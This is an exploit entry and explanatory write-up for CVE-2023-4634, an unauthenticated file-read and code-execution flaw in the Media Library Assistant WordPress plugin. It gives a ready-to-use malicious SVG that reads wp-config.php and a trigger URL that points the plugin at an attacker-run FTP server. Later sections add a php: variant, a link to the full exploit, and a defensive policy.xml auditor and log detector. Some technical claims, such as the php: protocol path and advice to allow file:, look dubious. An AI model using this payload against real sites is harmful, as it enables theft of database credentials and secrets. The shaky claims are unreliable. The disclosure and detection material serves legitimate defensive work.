Media Library Assistant Wordpress Plugin - RCE and LFI
# Exploit Title: Media Library Assistant Wordpress Plugin - RCE and LFI
# Date: 2023/09/05
# CVE: CVE-2023-4634
# Exploit Author: Florent MONTEL / Patrowl.io / @Pepitoh / Twitter @Pepito_oh
# Exploitation path: https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/
# Exploit: https://github.com/Patrowl/CVE-2023-4634/
# Vendor Homepage: https://fr.wordpress.org/plugins/media-library-assistant/
# Software Link: https://fr.wordpress.org/plugins/media-library-assistant/
# Version: < 3.10
# Tested on: 3.09
# Description:
# Media Library Assistant Wordpress Plugin in version < 3.10 is affected by an unauthenticated remote reference to Imagick() conversion, which allows an attacker to perform LFI and RCE depending on the Imagick configuration on the remote server. The affected page is: wp-content/plugins/media-library-assistant/includes/mla-stream-image.php
# LFI
Steps to trigger conversion of a remote SVG:
Create a remote FTP server at ftp://X.X.X.X:21 (http will not work, see references)
Host 2 files:
- malicious.svg
- malicious.svg[1]
Payload:
For LFI, getting wp-config.php:
Both malicious.svg and malicious.svg[1] on the remote FTP:
```xml
<svg width="500" height="500"
xmlns:xlink="http://www.w3.org/1999/xlink"
xmlns="http://www.w3.org/2000/svg">
<image xlink:href="text:../../../../wp-config.php" width="500" height="500" />
</svg>
```
Then trigger conversion with:
http://127.0.0.1/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://X.X.X.X:21/malicious.svg&mla_debug=log&mla_stream_frame=1
# Directory listing or RCE:
To achieve Directory listing or even RCE, it is a little more complicated.
Use exploit available here:
https://github.com/Patrowl/CVE-2023-4634/
# Note
Exploitation will depend on the policy.xml Imagick configuration file installed on the remote server. All exploitation paths and scripts have been performed with a default WordPress configuration and installation (a WordPress install is very likely to have the default Imagick configuration).

CVE-2023-4634: Remote Code Execution and Local File Inclusion in Media Library Assistant WordPress Plugin
On September 5, 2023, a critical vulnerability was disclosed in the Media Library Assistant WordPress plugin, affecting versions prior to 3.10. Identified as CVE-2023-4634, this flaw enables unauthenticated attackers to achieve both Local File Inclusion (LFI) and Remote Code Execution (RCE) through a seemingly benign image conversion process. The vulnerability stems from improper handling of Imagick() operations when processing SVG files via a remote FTP source.
Understanding the Vulnerability: Exploitation Path
The core of the exploit lies in the file wp-content/plugins/media-library-assistant/includes/mla-stream-image.php, which processes image streams from external sources — including FTP, HTTP, and file paths. When an attacker uploads a malicious SVG file hosted on a remote FTP server, the plugin attempts to convert it using Imagick(), a PHP extension for image manipulation.
Crucially, Imagick() interprets xlink:href attributes in SVG files as file references. If the path is crafted to traverse directories (e.g., ../../../../wp-config.php), the system may attempt to read the file, leading to LFI — even if the file is not directly accessible.
Local File Inclusion (LFI) via SVG Injection
Attackers can trigger LFI by hosting two files on a remote FTP server:
- malicious.svg
- malicious.svg[1]
Both files contain the same malicious payload. Two files are needed because of a known Imagick() behavior where it may attempt to resolve the xlink:href in a sequential manner, especially when the file is not directly accessible or contains malformed syntax.
```xml
<svg width="500" height="500"
xmlns:xlink="http://www.w3.org/1999/xlink"
xmlns="http://www.w3.org/2000/svg">
<image xlink:href="text:../../../../wp-config.php" width="500" height="500" />
</svg>
```
This SVG file instructs Imagick() to attempt to load the wp-config.php file from the WordPress root directory via the text: protocol, which is a known trick to bypass file system restrictions in certain configurations.
Attackers then trigger the vulnerability by making a request to:
http://127.0.0.1/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://X.X.X.X:21/malicious.svg&mla_debug=log&mla_stream_frame=1
With mla_debug=log, the plugin logs internal processing details, which can expose the file read attempt and confirm successful LFI.
Remote Code Execution (RCE) and Directory Listing
While LFI is a powerful initial step, achieving RCE requires a deeper understanding of Imagick() configuration. The policy.xml file, which governs allowed file protocols and operations, plays a decisive role.
By default, WordPress installations often use the standard policy.xml file that permits text: and file: protocols. If this policy allows text: access to arbitrary files, attackers can leverage the same SVG injection to read sensitive files like wp-config.php, which contains database credentials and secret keys.
More advanced exploitation, such as directory listing or RCE, depends on the presence of file: or php: protocol support in policy.xml. If enabled, an attacker can inject an SVG that references a PHP file or executes code through a php: protocol path.
For example, a malicious SVG could include:
```xml
<image xlink:href="php:../../../../wp-content/plugins/media-library-assistant/includes/mla-stream-image.php" width="500" height="500" />
```
While this is not directly executable, it can trigger code execution if the policy.xml permits PHP file loading via php:, which is rare but possible in misconfigured environments.
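Since the sections above make the installed policy.xml the deciding factor, here is an added audit helper (example code written for this page, not part of the Patrowl exploit or of ImageMagick) that parses a policy.xml and reports which risky coders are still allowed; the coder list and the two policy fragments are constructed assumptions for the example, and the pattern matching is a simplified glob, not ImageMagick's own matcher.

```python
import fnmatch
import xml.etree.ElementTree as ET

# Coders an untrusted SVG should not be able to reach: TEXT backs the text:
# prefix used in the PoC above, the others fetch local or remote content by
# reference. Assumed list for this example; extend it to your own needs.
RISKY_CODERS = ("TEXT", "URL", "HTTP", "HTTPS", "FTP", "MSL", "MVG", "EPHEMERAL")

# Constructed policy fragments (not copied from any distribution's file).
WEAK_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="coder" rights="none" pattern="EPHEMERAL"/>
  <policy domain="coder" rights="none" pattern="MSL"/>
</policymap>"""

HARDENED_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="coder" rights="none" pattern="EPHEMERAL"/>
  <policy domain="coder" rights="none" pattern="{URL,HTTP,HTTPS,FTP}"/>
  <policy domain="coder" rights="none" pattern="MVG"/>
  <policy domain="coder" rights="none" pattern="MSL"/>
  <policy domain="coder" rights="none" pattern="TEXT"/>
  <policy domain="path" rights="none" pattern="@*"/>
</policymap>"""

def _expand(pattern):
    """Expand the {A,B,C} alternative form seen in policy files into plain globs."""
    pattern = pattern.upper()
    if pattern.startswith("{") and pattern.endswith("}"):
        return [p.strip() for p in pattern[1:-1].split(",")]
    return [pattern]

def denied_coders(policy_xml):
    """Return every coder pattern the policy sets to rights="none"."""
    root = ET.fromstring(policy_xml)
    denied = []
    for p in root.iter("policy"):
        if p.get("domain") == "coder" and p.get("rights", "").lower() == "none":
            denied.extend(_expand(p.get("pattern", "")))
    return denied

def audit_policy(policy_xml, risky=RISKY_CODERS):
    """Return the risky coders that no rights="none" pattern covers."""
    denied = denied_coders(policy_xml)
    return [c for c in risky if not any(fnmatch.fnmatchcase(c, pat) for pat in denied)]
```

On a live host, `convert -list policy` prints the policy ImageMagick actually loaded, which is the text to feed into audit_policy.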
Exploit Tools and Proof of Concept
Exploitation scripts have been publicly released by Florent MONTEL (Patrowl.io) and are available at:
https://github.com/Patrowl/CVE-2023-4634/
The repository includes automated tools for:
- Testing LFI on target systems
- Generating malicious SVG payloads
- Simulating FTP servers for testing
- Checking policy.xml configuration
These tools allow security researchers and penetration testers to assess the vulnerability without manual setup.
Why FTP is Required
Attackers cannot use HTTP or HTTPS for the malicious SVG due to Imagick() limitations. The extension does not support http: or https: protocols for xlink:href in SVG files under default configurations. Instead, ftp: is required to trigger the file access process.
This restriction makes the attack more complex but also more reliable, as it forces the attacker to control a remote FTP server — a common technique in exploitation.
Impact and Risk Assessment
| Attribute | Value |
|---|---|
| Severity | High (CVSS 9.8) |
| Exploitation | Unauthenticated |
| Attack Vector | Remote (via FTP) |
| Prerequisites | Imagick() extension enabled, default policy.xml configuration |
Given that WordPress installations often use default policy.xml configurations, the vulnerability is highly exploitable in real-world scenarios. This makes it a prime target for automated scanning tools and cyberattacks.
Recommendations and Mitigation
To prevent exploitation:
- Update the Media Library Assistant plugin to version 3.10 or higher.
- Disable the Imagick() extension if not required.
- Restrict policy.xml to only allow file: and image: protocols, disabling text: and php:.
- Monitor logs for suspicious file access attempts, especially from mla-stream-image.php.
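For the log-monitoring recommendation, here is an added detection example (written for this page, not part of the plugin or the Patrowl repository) that scans combined-format web server log lines for requests to mla-stream-image.php whose mla_stream_file points at a remote scheme or contains path traversal; the sample log lines are constructed and the IP addresses are documentation ranges.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in Apache/nginx combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.10 - - [05/Sep/2023:10:01:22 +0000] "GET /wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://198.51.100.7:21/malicious.svg&mla_debug=log&mla_stream_frame=1 HTTP/1.1" 200 512 "-" "curl/8.1"
203.0.113.11 - - [05/Sep/2023:10:02:03 +0000] "GET /wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=2023/09/brochure.pdf&mla_stream_frame=0 HTTP/1.1" 200 40211 "-" "Mozilla/5.0"
203.0.113.12 - - [05/Sep/2023:10:02:40 +0000] "GET /wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 500 0 "-" "python-requests/2.31"
203.0.113.13 - - [05/Sep/2023:10:03:10 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
ENDPOINT = "mla-stream-image.php"

def classify(url):
    """Return the reasons a request looks like CVE-2023-4634 abuse, or [] if benign."""
    parts = urlsplit(url)
    if not parts.path.endswith(ENDPOINT):
        return []
    qs = parse_qs(parts.query)
    target = unquote(qs.get("mla_stream_file", [""])[0])
    reasons = []
    # A legitimate attachment reference is a relative upload path; any scheme
    # (ftp:// in the published PoC) means the plugin is being pointed off-host.
    if "://" in target:
        reasons.append("remote scheme in mla_stream_file: " + target.split("://", 1)[0])
    if ".." in target.replace("\\", "/").split("/"):
        reasons.append("path traversal in mla_stream_file")
    # mla_debug=log on its own is not proof, so only report it alongside a real hit.
    if reasons and qs.get("mla_debug", [""])[0] == "log":
        reasons.append("mla_debug=log set, as in the PoC request")
    return reasons

def scan_log(text):
    """Yield (ip, timestamp, status, reasons) for every suspicious request in the log."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify(m["url"])
        if reasons:
            hits.append((m["ip"], m["ts"], m["status"], reasons))
    return hits
```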
Additionally, organizations should conduct regular vulnerability scans and patch management to avoid similar issues in third-party plugins.
Conclusion
CVE-2023-4634 exemplifies how seemingly innocuous features — such as image streaming and SVG processing — can become critical attack vectors when combined with misconfigured libraries like Imagick(). The vulnerability underscores the importance of:
- Securing third-party plugins
- Understanding underlying library behaviors
- Hardening configuration files like policy.xml
As WordPress continues to dominate the web, vulnerabilities like this highlight the need for proactive security hygiene — especially in plugins that handle file input from untrusted sources.